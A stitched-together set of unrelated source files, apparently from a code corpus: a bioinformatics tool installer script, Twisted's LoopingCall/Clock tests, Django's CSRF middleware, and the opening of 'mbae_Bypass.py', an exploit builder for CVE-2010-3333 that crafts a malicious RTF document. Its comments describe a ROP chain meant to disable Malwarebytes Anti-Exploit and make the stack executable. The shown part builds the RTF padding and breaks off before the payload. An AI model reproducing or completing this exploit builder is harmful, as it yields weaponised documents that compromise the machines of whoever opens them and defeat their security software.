os.chdir(path)
output = subprocess.check_output("uname")
chk2 = self.checkfolder("salmon-1.1.0_linux_x86_64")
if(chk2 == False):
print("-----salmon installation-------")
os.system("wget https://github.com/COMBINE-lab/salmon/releases/download/v1.1.0/salmon-1.1.0_linux_x86_64.tar.gz >"+path+"/LogFiles/salmon.txt 2> "+path+"/LogFiles/salmonError.txt")
os.system("tar -zxvf salmon-1.1.0_linux_x86_64.tar.gz >"+path+"/LogFiles/salmon.txt 2> "+path+"/LogFiles/salmonError.txt")
self.prog_installed.append(path+"/salmon-1.1.0_linux_x86_64.tar.gz")
chksalmon=self.checkfolder(path+"/salmon-latest_linux_x86_64/bin/salmon")
if(chksalmon==False):
print("Salmon did not install correctly. Please try again")
sys.exit()
else:
print("Salmon installed successfully")
else:
print ("The path already contains a folder named salmon-1.1.0_linux_x86_64.tar.gz. please rename it or remove it from the path")
sys.exit()
if (prog == 3):
os.chdir(path)
chk2 = self.checkfolder("ORNA")
if(chk2 == False):
os.system("git clone https://github.com/SchulzLab/ORNA >"+path+"/LogFiles/ORNA.txt 2> "+path+"/LogFiles/ORNAError.txt")
self.prog_installed.append(path+"/ORNA")
else:
print ("The path already contains a folder named ORNA. Please rename it or remove it from the path")
if (prog == 4):
os.chdir(path)
s,t = subprocess.check_output("which cd-hit-est")
if(s == 256):
uc = input("cd-hit is not found in the environment variables. Do you want to install (y/n) : ")
if(uc == "y"):
os.system("git clone https://github.com/weizhongli/cdhit >"+path+"/LogFiles/cdhit.txt 2> "+path+"/LogFiles/cdhitError.txt")
self.install_cdhit(path)
os.chdir(path)
else:
print ("Please remember that cd-hit-est is required for the running of KREATION and must be in the environment variable $PATH")
chk2 = self.checkfolder("KREATION")
if(chk2 == False):
print("-----KREATION installation-------")
os.system("git clone https://github.com/SchulzLab/KREATION >"+path+"/LogFiles/KREATION.txt 2> "+path+"/LogFiles/KreationError.txt")
self.prog_installed.append(path+"/KREATION")
chkkreation=self.checkfolder(path+"/KREATION/KREATION.py")
if(chkkreation==False):
print("KREATION did not install correctly. Please try again")
sys.exit()
else:
print("KREATION installed successfully")
else:
print ("The path already contains a folder named KREATION. Please rename it or remove it from the path")
if (prog == 5):
os.chdir(path)
chk1 = self.checkfolder("SEECER.tar.gz")
if(chk1 == False):
print("-----SEECER installation-----")
os.system("wget https://zenodo.org/record/3686150/files/SEECER.tar.gz > "+path+"/LogFiles/Seecer.txt 2> "+path+"/LogFiles/SeecerError.txt")
os.system("tar -zxvf SEECER.tar.gz > "+path+"/LogFiles/Seecer.txt 2> "+path+"/LogFiles/SeecerError.txt")
chkkreation=self.checkfolder(path+"/SEECER-0.1.3/SEECER/bin/run_seecer.sh")
if(chkkreation==False):
print("SEECER did not install correctly. Please try again")
sys.exit()
else:
print("SEECER installed successfully")
else:
print ("The path already contains a folder named SEECER.tar.gz. Please rename it or remove it from the path")
if(prog==8):
os.chdir(path)
chk5 = self.checkfolder("velvet")
if(chk5 == False):
os.system("git clone http://github.com/dzerbino/velvet.git >"+path+"/LogFiles/Velvet.txt 2> "+path+"/LogFiles/VelvetError.txt")
else:
print ("The path already contains a folder named velvet. please rename the folder or remove it from the path")
sys.exit()
def install_oases(self, path, cs):
print("------Oases installation------")
path2 = path + "/oases"
os.chdir(path2)
os.system("make "+cs+" > "+path+"/LogFiles/Oases.txt 2> "+path+"/LogFiles/OasesError.txt")
self.prog_installed.append(path2)
chk=self.checkfolder(path+"/oases/oases")
if(chk==False):
print("Oases did not install correctly. Please try again")
sys.exit()
else:
print("Oases installed successfully")
def install_orna(self, path):
print("------ORNA installation------")
path2 = path + "/ORNA"
os.chdir(path2)
os.system("bash install.sh > "+path+"/LogFiles/ORNA.txt 2> "+path+"/LogFiles/ORNAError.txt")
self.prog_installed.append(path2)
chk=self.checkfolder(path+"/ORNA/build/bin/ORNA")
if(chk==False):
print("ORNA did not install correctly. Please try again")
sys.exit()
else:
print("ORNA installed successfully")
def install_velvet(self,path, cs):
path1 = path + "/velvet"
os.chdir(path1)
print("------Velvet installation------")
os.system("make "+cs+" > "+path+"/LogFiles/velvet.txt 2> "+path+"/LogFiles/VelvetError.txt")
self.prog_installed.append(path1)
chk=self.checkfolder(path+"/velvet/velvetg") and self.checkfolder(path+"/velvet/velveth")
if(chk==False):
print("velvet did not install correctly. Please try again")
sys.exit()
else:
print("velvet installed successfully")
def install_cdhit(self, path):
path1 = path + "/cdhit"
os.chdir(path1)
print("------cd-hit-est installation------")
os.system("make > "+path+"/LogFiles/cdhit.txt 2> "+path+"/LogFiles/cdHitError.txt")
def getoptions(self):
parser = OptionParser()
parser.add_option("-f", "--folder", dest="foldername", help="destination folder")
(options, args) = parser.parse_args()
return options
def checkfolder(self, program):
var = os.path.exists(program)
return var
########### MAIN PROGRAM ###########
x = install_script()
y1 = x.getoptions()
if(y1.foldername != None):
try:
os.chdir(y1.foldername)
except:
uc = input("folder "+ y1.foldername + " does not exists. Do you want to create one (y/n) : ")
if(uc == "y"):
os.system("mkdir " +y1.foldername)
os.chdir(y1.foldername)
else:
sys.exit()
pwd = os.getcwd()
os.system("mkdir LogFiles")
print ("Programs to install :")
print ("1. OASES")
print ("2. SALMON")
print ("3. ORNA")
print ("4. KREATION")
print ("5. SEECER")
print ("6. ALL")
print ("7. QUIT")
x1 = input("Enter the option number (if multiple options then separate it by comma): ")
y = x1.split(",")
acs = ""
vd = ""
flg = 0
cs = ""
a13 = ""
if("7" in y):
print("Thank you. It was nice working for you")
sys.exit()
if "6" in y:
#Obtaining and installing oases and velvet
vc = input("Execution of Oases requires velvet. Do you want to install velvet (y/n) : ")
if(vc == "y"):
ch = input("Do you want to include additional compilation settings for velvet (refer to velvet manual for details) y/n : ")
if(ch == "y"):
print("Enter the additional compilation settings of velvet seperated by space (for instance - \'MAXKMERLENGTH=57\'):")
a1 = input()
a11 = a1.split()
for a2 in a11:
a2 = a2.replace("'","")
a2 = "\'" + a2 + "\'"
a13 = a13 + " " + a2
cs = cs + a13
flg = 1
cs = cs + "\'VELVET_DIR="+pwd+"/velvet\'"
if(vc == "n"):
vd = input("Enter the location of velvet : ")
cs = cs + " \'VELVET_DIR=" + vd +"\'"
x.obtaining_tar(1, pwd)
if (flg == 1):
x.obtaining_tar(8, pwd)
x.install_velvet(pwd, cs)
x.install_oases(pwd, cs)
#Obtaining salmon
x.obtaining_tar(2, pwd)
#Obtaining ORNA
x.obtaining_tar(3, pwd)
x.install_orna(pwd)
#Obtaining KREATION
x.obtaining_tar(4, pwd)
#Obtaining SEECER
x.obtaining_tar(5, pwd)
else:
for i in y:
if(int(i) == 1):
vc = input("Execution of Oases requires velvet. Do you want to install velvet (y/n) : ")
if(vc == "y"):
ch = input("Do you want to include additional compilation settings for velvet (refer to velvet manual for details) y/n : ")
if(ch == "y"):
print("Enter the additional compilation settings of velvet seperated by space (for instance - \'MAXKMERLENGTH=57\'):")
a1 = input()
a11 = a1.split()
for a2 in a11:
a2 = a2.replace("'","")
a2 = "\'" + a2 + "\'"
a13 = a13 + " " + a2
cs = cs + a13
flg = 1
cs = cs + " \'VELVET_DIR="+pwd+"/velvet\'"
if(vc == "n"):
vd = input("Enter the location of velvet : ")
if("\\" not in vd):
cs = cs + " \'VELVET_DIR=" +pwd+"\\"+ vd +"\'"
else:
cs = cs + " \'VELVET_DIR=" + vd +"\'"
x.obtaining_tar(1,pwd)
if(flg == 1):
x.obtaining_tar(8,pwd)
x.install_velvet(pwd, cs)
x.install_oases(pwd, cs)
elif(int(i)==3):
x.obtaining_tar(3,pwd)
x.install_orna(pwd)
else:
x.obtaining_tar(int(i), pwd)
| mit |
zhuwenping/python-for-android | python-modules/twisted/twisted/test/test_task.py | 56 | 20565 | # Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.python.compat import set
from twisted.trial import unittest
from twisted.internet import interfaces, task, reactor, defer, error
# Be compatible with any jerks who used our private stuff
Clock = task.Clock
from twisted.python import failure
class TestableLoopingCall(task.LoopingCall):
def __init__(self, clock, *a, **kw):
super(TestableLoopingCall, self).__init__(*a, **kw)
self.clock = clock
class TestException(Exception):
pass
class ClockTestCase(unittest.TestCase):
"""
Test the non-wallclock based clock implementation.
"""
def testSeconds(self):
"""
Test that the L{seconds} method of the fake clock returns fake time.
"""
c = task.Clock()
self.assertEquals(c.seconds(), 0)
def testCallLater(self):
"""
Test that calls can be scheduled for later with the fake clock and
hands back an L{IDelayedCall}.
"""
c = task.Clock()
call = c.callLater(1, lambda a, b: None, 1, b=2)
self.failUnless(interfaces.IDelayedCall.providedBy(call))
self.assertEquals(call.getTime(), 1)
self.failUnless(call.active())
def testCallLaterCancelled(self):
"""
Test that calls can be cancelled.
"""
c = task.Clock()
call = c.callLater(1, lambda a, b: None, 1, b=2)
call.cancel()
self.failIf(call.active())
def test_callLaterOrdering(self):
"""
Test that the DelayedCall returned is not one previously
created.
"""
c = task.Clock()
call1 = c.callLater(10, lambda a, b: None, 1, b=2)
call2 = c.callLater(1, lambda a, b: None, 3, b=4)
self.failIf(call1 is call2)
def testAdvance(self):
"""
Test that advancing the clock will fire some calls.
"""
events = []
c = task.Clock()
call = c.callLater(2, lambda: events.append(None))
c.advance(1)
self.assertEquals(events, [])
c.advance(1)
self.assertEquals(events, [None])
self.failIf(call.active())
def testAdvanceCancel(self):
"""
Test attemping to cancel the call in a callback.
AlreadyCalled should be raised, not for example a ValueError from
removing the call from Clock.calls. This requires call.called to be
set before the callback is called.
"""
c = task.Clock()
def cb():
self.assertRaises(error.AlreadyCalled, call.cancel)
call = c.callLater(1, cb)
c.advance(1)
def testCallLaterDelayed(self):
"""
Test that calls can be delayed.
"""
events = []
c = task.Clock()
call = c.callLater(1, lambda a, b: events.append((a, b)), 1, b=2)
call.delay(1)
self.assertEquals(call.getTime(), 2)
c.advance(1.5)
self.assertEquals(events, [])
c.advance(1.0)
self.assertEquals(events, [(1, 2)])
def testCallLaterResetLater(self):
"""
Test that calls can have their time reset to a later time.
"""
events = []
c = task.Clock()
call = c.callLater(2, lambda a, b: events.append((a, b)), 1, b=2)
c.advance(1)
call.reset(3)
self.assertEquals(call.getTime(), 4)
c.advance(2)
self.assertEquals(events, [])
c.advance(1)
self.assertEquals(events, [(1, 2)])
def testCallLaterResetSooner(self):
"""
Test that calls can have their time reset to an earlier time.
"""
events = []
c = task.Clock()
call = c.callLater(4, lambda a, b: events.append((a, b)), 1, b=2)
call.reset(3)
self.assertEquals(call.getTime(), 3)
c.advance(3)
self.assertEquals(events, [(1, 2)])
def test_getDelayedCalls(self):
"""
Test that we can get a list of all delayed calls
"""
c = task.Clock()
call = c.callLater(1, lambda x: None)
call2 = c.callLater(2, lambda x: None)
calls = c.getDelayedCalls()
self.assertEquals(set([call, call2]), set(calls))
def test_getDelayedCallsEmpty(self):
"""
Test that we get an empty list from getDelayedCalls on a newly
constructed Clock.
"""
c = task.Clock()
self.assertEquals(c.getDelayedCalls(), [])
def test_providesIReactorTime(self):
c = task.Clock()
self.failUnless(interfaces.IReactorTime.providedBy(c),
"Clock does not provide IReactorTime")
class LoopTestCase(unittest.TestCase):
"""
Tests for L{task.LoopingCall} based on a fake L{IReactorTime}
implementation.
"""
def test_defaultClock(self):
"""
L{LoopingCall}'s default clock should be the reactor.
"""
call = task.LoopingCall(lambda: None)
self.assertEqual(call.clock, reactor)
def test_callbackTimeSkips(self):
"""
When more time than the defined interval passes during the execution
of a callback, L{LoopingCall} should schedule the next call for the
next interval which is still in the future.
"""
times = []
callDuration = None
clock = task.Clock()
def aCallback():
times.append(clock.seconds())
clock.advance(callDuration)
call = task.LoopingCall(aCallback)
call.clock = clock
# Start a LoopingCall with a 0.5 second increment, and immediately call
# the callable.
callDuration = 2
call.start(0.5)
# Verify that the callable was called, and since it was immediate, with
# no skips.
self.assertEqual(times, [0])
# The callback should have advanced the clock by the callDuration.
self.assertEqual(clock.seconds(), callDuration)
# An iteration should have occurred at 2, but since 2 is the present
# and not the future, it is skipped.
clock.advance(0)
self.assertEqual(times, [0])
# 2.5 is in the future, and is not skipped.
callDuration = 1
clock.advance(0.5)
self.assertEqual(times, [0, 2.5])
self.assertEqual(clock.seconds(), 3.5)
# Another iteration should have occurred, but it is again the
# present and not the future, so it is skipped as well.
clock.advance(0)
self.assertEqual(times, [0, 2.5])
# 4 is in the future, and is not skipped.
callDuration = 0
clock.advance(0.5)
self.assertEqual(times, [0, 2.5, 4])
self.assertEqual(clock.seconds(), 4)
def test_reactorTimeSkips(self):
"""
When more time than the defined interval passes between when
L{LoopingCall} schedules itself to run again and when it actually
runs again, it should schedule the next call for the next interval
which is still in the future.
"""
times = []
clock = task.Clock()
def aCallback():
times.append(clock.seconds())
# Start a LoopingCall that tracks the time passed, with a 0.5 second
# increment.
call = task.LoopingCall(aCallback)
call.clock = clock
call.start(0.5)
# Initially, no time should have passed!
self.assertEqual(times, [0])
# Advance the clock by 2 seconds (2 seconds should have passed)
clock.advance(2)
self.assertEqual(times, [0, 2])
# Advance the clock by 1 second (3 total should have passed)
clock.advance(1)
self.assertEqual(times, [0, 2, 3])
# Advance the clock by 0 seconds (this should have no effect!)
clock.advance(0)
self.assertEqual(times, [0, 2, 3])
def test_reactorTimeCountSkips(self):
"""
When L{LoopingCall} schedules itself to run again, if more than the
specified interval has passed, it should schedule the next call for the
next interval which is still in the future. If it was created
using L{LoopingCall.withCount}, a positional argument will be
inserted at the beginning of the argument list, indicating the number
of calls that should have been made.
"""
times = []
clock = task.Clock()
def aCallback(numCalls):
times.append((clock.seconds(), numCalls))
# Start a LoopingCall that tracks the time passed, and the number of
# skips, with a 0.5 second increment.
call = task.LoopingCall.withCount(aCallback)
call.clock = clock
INTERVAL = 0.5
REALISTIC_DELAY = 0.01
call.start(INTERVAL)
# Initially, no seconds should have passed, and one calls should have
# been made.
self.assertEqual(times, [(0, 1)])
# After the interval (plus a small delay, to account for the time that
# the reactor takes to wake up and process the LoopingCall), we should
# still have only made one call.
clock.advance(INTERVAL + REALISTIC_DELAY)
self.assertEqual(times, [(0, 1), (INTERVAL + REALISTIC_DELAY, 1)])
# After advancing the clock by three intervals (plus a small delay to
# account for the reactor), we should have skipped two calls; one less
# than the number of intervals which have completely elapsed. Along
# with the call we did actually make, the final number of calls is 3.
clock.advance((3 * INTERVAL) + REALISTIC_DELAY)
self.assertEqual(times,
[(0, 1), (INTERVAL + REALISTIC_DELAY, 1),
((4 * INTERVAL) + (2 * REALISTIC_DELAY), 3)])
# Advancing the clock by 0 seconds should not cause any changes!
clock.advance(0)
self.assertEqual(times,
[(0, 1), (INTERVAL + REALISTIC_DELAY, 1),
((4 * INTERVAL) + (2 * REALISTIC_DELAY), 3)])
def test_countLengthyIntervalCounts(self):
"""
L{LoopingCall.withCount} counts only calls that were expected to be
made. So, if more than one, but less than two intervals pass between
invocations, it won't increase the count above 1. For example, a
L{LoopingCall} with interval T expects to be invoked at T, 2T, 3T, etc.
However, the reactor takes some time to get around to calling it, so in
practice it will be called at T+something, 2T+something, 3T+something;
and due to other things going on in the reactor, "something" is
variable. It won't increase the count unless "something" is greater
than T. So if the L{LoopingCall} is invoked at T, 2.75T, and 3T,
the count has not increased, even though the distance between
invocation 1 and invocation 2 is 1.75T.
"""
times = []
clock = task.Clock()
def aCallback(count):
times.append((clock.seconds(), count))
# Start a LoopingCall that tracks the time passed, and the number of
# calls, with a 0.5 second increment.
call = task.LoopingCall.withCount(aCallback)
call.clock = clock
INTERVAL = 0.5
REALISTIC_DELAY = 0.01
call.start(INTERVAL)
self.assertEqual(times.pop(), (0, 1))
# About one interval... So far, so good
clock.advance(INTERVAL + REALISTIC_DELAY)
self.assertEqual(times.pop(), (INTERVAL + REALISTIC_DELAY, 1))
# Oh no, something delayed us for a while.
clock.advance(INTERVAL * 1.75)
self.assertEqual(times.pop(), ((2.75 * INTERVAL) + REALISTIC_DELAY, 1))
# Back on track! We got invoked when we expected this time.
clock.advance(INTERVAL * 0.25)
self.assertEqual(times.pop(), ((3.0 * INTERVAL) + REALISTIC_DELAY, 1))
def testBasicFunction(self):
# Arrange to have time advanced enough so that our function is
# called a few times.
# Only need to go to 2.5 to get 3 calls, since the first call
# happens before any time has elapsed.
timings = [0.05, 0.1, 0.1]
clock = task.Clock()
L = []
def foo(a, b, c=None, d=None):
L.append((a, b, c, d))
lc = TestableLoopingCall(clock, foo, "a", "b", d="d")
D = lc.start(0.1)
theResult = []
def saveResult(result):
theResult.append(result)
D.addCallback(saveResult)
clock.pump(timings)
self.assertEquals(len(L), 3,
"got %d iterations, not 3" % (len(L),))
for (a, b, c, d) in L:
self.assertEquals(a, "a")
self.assertEquals(b, "b")
self.assertEquals(c, None)
self.assertEquals(d, "d")
lc.stop()
self.assertIdentical(theResult[0], lc)
# Make sure it isn't planning to do anything further.
self.failIf(clock.calls)
def testDelayedStart(self):
timings = [0.05, 0.1, 0.1]
clock = task.Clock()
L = []
lc = TestableLoopingCall(clock, L.append, None)
d = lc.start(0.1, now=False)
theResult = []
def saveResult(result):
theResult.append(result)
d.addCallback(saveResult)
clock.pump(timings)
self.assertEquals(len(L), 2,
"got %d iterations, not 2" % (len(L),))
lc.stop()
self.assertIdentical(theResult[0], lc)
self.failIf(clock.calls)
def testBadDelay(self):
lc = task.LoopingCall(lambda: None)
self.assertRaises(ValueError, lc.start, -1)
# Make sure that LoopingCall.stop() prevents any subsequent calls.
def _stoppingTest(self, delay):
ran = []
def foo():
ran.append(None)
clock = task.Clock()
lc = TestableLoopingCall(clock, foo)
d = lc.start(delay, now=False)
lc.stop()
self.failIf(ran)
self.failIf(clock.calls)
def testStopAtOnce(self):
return self._stoppingTest(0)
def testStoppingBeforeDelayedStart(self):
return self._stoppingTest(10)
class ReactorLoopTestCase(unittest.TestCase):
# Slightly inferior tests which exercise interactions with an actual
# reactor.
def testFailure(self):
def foo(x):
raise TestException(x)
lc = task.LoopingCall(foo, "bar")
return self.assertFailure(lc.start(0.1), TestException)
def testFailAndStop(self):
def foo(x):
lc.stop()
raise TestException(x)
lc = task.LoopingCall(foo, "bar")
return self.assertFailure(lc.start(0.1), TestException)
def testEveryIteration(self):
ran = []
def foo():
ran.append(None)
if len(ran) > 5:
lc.stop()
lc = task.LoopingCall(foo)
d = lc.start(0)
def stopped(ign):
self.assertEquals(len(ran), 6)
return d.addCallback(stopped)
def testStopAtOnceLater(self):
# Ensure that even when LoopingCall.stop() is called from a
# reactor callback, it still prevents any subsequent calls.
d = defer.Deferred()
def foo():
d.errback(failure.DefaultException(
"This task also should never get called."))
self._lc = task.LoopingCall(foo)
self._lc.start(1, now=False)
reactor.callLater(0, self._callback_for_testStopAtOnceLater, d)
return d
def _callback_for_testStopAtOnceLater(self, d):
self._lc.stop()
reactor.callLater(0, d.callback, "success")
def testWaitDeferred(self):
# Tests if the callable isn't scheduled again before the returned
# deferred has fired.
timings = [0.2, 0.8]
clock = task.Clock()
def foo():
d = defer.Deferred()
d.addCallback(lambda _: lc.stop())
clock.callLater(1, d.callback, None)
return d
lc = TestableLoopingCall(clock, foo)
d = lc.start(0.2)
clock.pump(timings)
self.failIf(clock.calls)
def testFailurePropagation(self):
# Tests if the failure of the errback of the deferred returned by the
# callable is propagated to the lc errback.
#
# To make sure this test does not hang trial when LoopingCall does not
# wait for the callable's deferred, it also checks there are no
# calls in the clock's callLater queue.
timings = [0.3]
clock = task.Clock()
def foo():
d = defer.Deferred()
clock.callLater(0.3, d.errback, TestException())
return d
lc = TestableLoopingCall(clock, foo)
d = lc.start(1)
self.assertFailure(d, TestException)
clock.pump(timings)
self.failIf(clock.calls)
return d
def test_deferredWithCount(self):
"""
In the case that the function passed to L{LoopingCall.withCount}
returns a deferred, which does not fire before the next interval
elapses, the function should not be run again. And if a function call
is skipped in this fashion, the appropriate count should be
provided.
"""
testClock = task.Clock()
d = defer.Deferred()
deferredCounts = []
def countTracker(possibleCount):
# Keep a list of call counts
deferredCounts.append(possibleCount)
# Return a deferred, but only on the first request
if len(deferredCounts) == 1:
return d
else:
return None
# Start a looping call for our countTracker function
# Set the increment to 0.2, and do not call the function on startup.
lc = task.LoopingCall.withCount(countTracker)
lc.clock = testClock
d = lc.start(0.2, now=False)
# Confirm that nothing has happened yet.
self.assertEquals(deferredCounts, [])
# Advance the clock by 0.2 and then 0.4;
testClock.pump([0.2, 0.4])
# We should now have exactly one count (of 1 call)
self.assertEquals(len(deferredCounts), 1)
# Fire the deferred, and advance the clock by another 0.2
d.callback(None)
testClock.pump([0.2])
# We should now have exactly 2 counts...
self.assertEquals(len(deferredCounts), 2)
# The first count should be 1 (one call)
# The second count should be 3 (calls were missed at about 0.6 and 0.8)
self.assertEquals(deferredCounts, [1, 3])
class DeferLaterTests(unittest.TestCase):
"""
Tests for L{task.deferLater}.
"""
def test_callback(self):
"""
The L{Deferred} returned by L{task.deferLater} is called back after
the specified delay with the result of the function passed in.
"""
results = []
flag = object()
def callable(foo, bar):
results.append((foo, bar))
return flag
clock = task.Clock()
d = task.deferLater(clock, 3, callable, 'foo', bar='bar')
d.addCallback(self.assertIdentical, flag)
clock.advance(2)
self.assertEqual(results, [])
clock.advance(1)
self.assertEqual(results, [('foo', 'bar')])
return d
def test_errback(self):
"""
The L{Deferred} returned by L{task.deferLater} is errbacked if the
supplied function raises an exception.
"""
def callable():
raise TestException()
clock = task.Clock()
d = task.deferLater(clock, 1, callable)
clock.advance(1)
return self.assertFailure(d, TestException)
def test_cancel(self):
"""
The L{Deferred} returned by L{task.deferLater} can be
cancelled to prevent the call from actually being performed.
"""
called = []
clock = task.Clock()
d = task.deferLater(clock, 1, called.append, None)
d.cancel()
def cbCancelled(ignored):
# Make sure there are no calls outstanding.
self.assertEquals([], clock.getDelayedCalls())
# And make sure the call didn't somehow happen already.
self.assertFalse(called)
self.assertFailure(d, defer.CancelledError)
d.addCallback(cbCancelled)
return d
| apache-2.0 |
liuliwork/django | django/middleware/csrf.py | 155 | 8477 | """
Cross Site Request Forgery Middleware.
This module provides a middleware that implements protection
against request forgeries from other sites.
"""
from __future__ import unicode_literals
import logging
import re
from django.conf import settings
from django.core.urlresolvers import get_callable
from django.utils.cache import patch_vary_headers
from django.utils.crypto import constant_time_compare, get_random_string
from django.utils.encoding import force_text
from django.utils.http import same_origin
logger = logging.getLogger('django.request')
REASON_NO_REFERER = "Referer checking failed - no Referer."
REASON_BAD_REFERER = "Referer checking failed - %s does not match %s."
REASON_NO_CSRF_COOKIE = "CSRF cookie not set."
REASON_BAD_TOKEN = "CSRF token missing or incorrect."
CSRF_KEY_LENGTH = 32
def _get_failure_view():
"""
Returns the view to be used for CSRF rejections
"""
return get_callable(settings.CSRF_FAILURE_VIEW)
def _get_new_csrf_key():
return get_random_string(CSRF_KEY_LENGTH)
def get_token(request):
"""
Returns the CSRF token required for a POST form. The token is an
alphanumeric value. A new token is created if one is not already set.
A side effect of calling this function is to make the csrf_protect
decorator and the CsrfViewMiddleware add a CSRF cookie and a 'Vary: Cookie'
header to the outgoing response. For this reason, you may need to use this
function lazily, as is done by the csrf context processor.
"""
if "CSRF_COOKIE" not in request.META:
request.META["CSRF_COOKIE"] = _get_new_csrf_key()
request.META["CSRF_COOKIE_USED"] = True
return request.META["CSRF_COOKIE"]
def rotate_token(request):
"""
Changes the CSRF token in use for a request - should be done on login
for security purposes.
"""
request.META.update({
"CSRF_COOKIE_USED": True,
"CSRF_COOKIE": _get_new_csrf_key(),
})
def _sanitize_token(token):
# Allow only alphanum
if len(token) > CSRF_KEY_LENGTH:
return _get_new_csrf_key()
token = re.sub('[^a-zA-Z0-9]+', '', force_text(token))
if token == "":
# In case the cookie has been truncated to nothing at some point.
return _get_new_csrf_key()
return token
class CsrfViewMiddleware(object):
"""
Middleware that requires a present and correct csrfmiddlewaretoken
for POST requests that have a CSRF cookie, and sets an outgoing
CSRF cookie.
This middleware should be used in conjunction with the csrf_token template
tag.
"""
# The _accept and _reject methods currently only exist for the sake of the
# requires_csrf_token decorator.
def _accept(self, request):
# Avoid checking the request twice by adding a custom attribute to
# request. This will be relevant when both decorator and middleware
# are used.
request.csrf_processing_done = True
return None
def _reject(self, request, reason):
logger.warning('Forbidden (%s): %s', reason, request.path,
extra={
'status_code': 403,
'request': request,
}
)
return _get_failure_view()(request, reason=reason)
def process_view(self, request, callback, callback_args, callback_kwargs):
if getattr(request, 'csrf_processing_done', False):
return None
try:
csrf_token = _sanitize_token(
request.COOKIES[settings.CSRF_COOKIE_NAME])
# Use same token next time
request.META['CSRF_COOKIE'] = csrf_token
except KeyError:
csrf_token = None
# Wait until request.META["CSRF_COOKIE"] has been manipulated before
# bailing out, so that get_token still works
if getattr(callback, 'csrf_exempt', False):
return None
# Assume that anything not defined as 'safe' by RFC2616 needs protection
if request.method not in ('GET', 'HEAD', 'OPTIONS', 'TRACE'):
if getattr(request, '_dont_enforce_csrf_checks', False):
# Mechanism to turn off CSRF checks for test suite.
# It comes after the creation of CSRF cookies, so that
# everything else continues to work exactly the same
# (e.g. cookies are sent, etc.), but before any
# branches that call reject().
return self._accept(request)
if request.is_secure():
# Suppose user visits http://example.com/
# An active network attacker (man-in-the-middle, MITM) sends a
# POST form that targets https://example.com/detonate-bomb/ and
# submits it via JavaScript.
#
# The attacker will need to provide a CSRF cookie and token, but
# that's no problem for a MITM and the session-independent
# nonce we're using. So the MITM can circumvent the CSRF
# protection. This is true for any HTTP connection, but anyone
# using HTTPS expects better! For this reason, for
# https://example.com/ we need additional protection that treats
# http://example.com/ as completely untrusted. Under HTTPS,
# Barth et al. found that the Referer header is missing for
# same-domain requests in only about 0.2% of cases or less, so
# we can use strict Referer checking.
referer = force_text(
request.META.get('HTTP_REFERER'),
strings_only=True,
errors='replace'
)
if referer is None:
return self._reject(request, REASON_NO_REFERER)
# Note that request.get_host() includes the port.
good_referer = 'https://%s/' % request.get_host()
if not same_origin(referer, good_referer):
reason = REASON_BAD_REFERER % (referer, good_referer)
return self._reject(request, reason)
if csrf_token is None:
# No CSRF cookie. For POST requests, we insist on a CSRF cookie,
# and in this way we can avoid all CSRF attacks, including login
# CSRF.
return self._reject(request, REASON_NO_CSRF_COOKIE)
# Check non-cookie token for match.
request_csrf_token = ""
if request.method == "POST":
try:
request_csrf_token = request.POST.get('csrfmiddlewaretoken', '')
except IOError:
# Handle a broken connection before we've completed reading
# the POST data. process_view shouldn't raise any
# exceptions, so we'll ignore and serve the user a 403
# (assuming they're still listening, which they probably
# aren't because of the error).
pass
if request_csrf_token == "":
# Fall back to X-CSRFToken, to make things easier for AJAX,
# and possible for PUT/DELETE.
request_csrf_token = request.META.get(settings.CSRF_HEADER_NAME, '')
if not constant_time_compare(request_csrf_token, csrf_token):
return self._reject(request, REASON_BAD_TOKEN)
return self._accept(request)
def process_response(self, request, response):
if getattr(response, 'csrf_processing_done', False):
return response
if not request.META.get("CSRF_COOKIE_USED", False):
return response
# Set the CSRF cookie even if it's already set, so we renew
# the expiry timer.
response.set_cookie(settings.CSRF_COOKIE_NAME,
request.META["CSRF_COOKIE"],
max_age=settings.CSRF_COOKIE_AGE,
domain=settings.CSRF_COOKIE_DOMAIN,
path=settings.CSRF_COOKIE_PATH,
secure=settings.CSRF_COOKIE_SECURE,
httponly=settings.CSRF_COOKIE_HTTPONLY
)
# Content varies with the CSRF cookie, so set the Vary header.
patch_vary_headers(response, ('Cookie',))
response.csrf_processing_done = True
return response
| bsd-3-clause |
r41p41/snippets | mbae_Bypass.py | 2 | 29684 | import binascii
import sys
filename = "finalOutput.DOC"
import struct
# CVE-2010-3333, builder picked from some random forum.
# modified to work on windows xp-8, office 2007 (enforced DEP)
# rop chain first moves NULL into 2 offsets of mbae internal structs, then changes stack to RWX using mona.py
# working as of April 6, 2015
file="{\\rtF#\ansi\aNsIcpg1252\dEFf0\defLANG1033{\fONttbl{\f1\fswiss\FPRQ2\fcHArsET0 Berlin Sans FB Demi;}{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}{\f2\fnil\fcharset2 Symbol;}{\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a}}{/*/*/*}"
file+="\x0d\x0a"*2400000 #inc for UD -_-
file+="{\colortbl ;\red73\green255\blue73;}"
file+="{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent0{\pntxtb\'B7}}\fi-720\li720\qc\cf1\ul\b\i\f0\fs20 5/28/2011\cf0\ulnone\b0\i0\par"
file+="\cf1\ul\b\i\f1\fs40{\pntext\f2\'B7\tab}...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd...............Aeriaisdosd...........................$iasdkasd.....